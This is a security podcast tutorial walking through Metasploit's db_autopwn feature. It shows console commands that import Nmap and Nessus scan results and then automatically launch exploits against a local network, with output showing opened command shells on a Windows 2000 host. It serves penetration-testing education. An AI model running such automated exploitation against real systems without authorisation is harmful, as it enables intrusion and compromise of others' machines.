Metasploit

From PaulDotCom episode 124:

Tech Segment: Automating Exploitation With Metasploit's db_autopwn

There is tremendous value in identifying vulnerabilities in your network, whether from the outside looking in, or the inside looking out. I like to try to automate this process as best I can, then use manual methods to further verify my work. For example, lets say I want to quickly verify the results from an Nmap or Nessus scan, and see if any of the Windows hosts are vulnerable to common Microsoft exploits. I can use Metasploit to do this, as it will test for the common remotely exploitable Windows vulnerabilities.

The first step is to setup Metasploit with a database module and create a database:

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create mynetwork
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: mynetwork 
msf >
From here, I have many options. I can import Nmap results from a previous scan using the XML results (-oX):
msf > db_import_nmap_xml mynetwork.xml
Using the db_nmap module I can run Nmap directly from Metasploit and populate the database:
msf > db_nmap -sS -T4 -O 192.168.1.0/24
[*] exec: "/usr/local/bin/nmap" "-sS" "-T4" "-O" "192.168.1.0/24" "-oX" "/tmp/dbnmap.29736.0"
NMAP: 
NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2008-09-25 09:05 EDT
I can now launch exploits against known targets, but only by open port (since we ran Nmap and only collected the open port information):
msf > db_autopwn -p -e
-p means exploit the vulnerabilities according to open port, and -e gives the "exploit" command. When I do this, I give Metasploit a lot of work to do:
<snip>
[*] Launching exploit/netware/smb/lsass_cifs (19/727) against 192.168.1.244:445...
[*] Launching exploit/windows/http/badblue_passthru (20/727) against 192.168.1.52:80... [-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] Started bind handler
[*] Trying target BadBlue 2.72b Universal...
[*] Server may not be vulnerable.
[*] Calling the vulnerable function...
[*] Successfully removed /config/password.txt
[*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657)
[*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80... 
[*] Started bind handler
<snip>
727 possible exploit vectors! That took a while. So, I decided to run Nessus against my network, then import the Nessus results:
msf > db_import_nessus_nbe windows.nbe
Now I run db_autopwn, and tell it to select modules based on the vulnerability reference:
msf > db_autopwn -x -e
This produces much better results:
msf > sessions -l

Active sessions
===============

    Id    Description     Tunnel
    --    -----------     ------
    1     Command shell   192.168.1.204:60530 -> 192.168.1.52:37541
    2     Command shell   192.168.1.204:61047 -> 192.168.1.52:13917
    3     Command shell   192.168.1.204:61306 -> 192.168.1.52:6112
    4     Command shell   192.168.1.204:61350 -> 192.168.1.52:5646

msf > sessions -i 2 
[*] Starting interaction with 2... 

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
Comments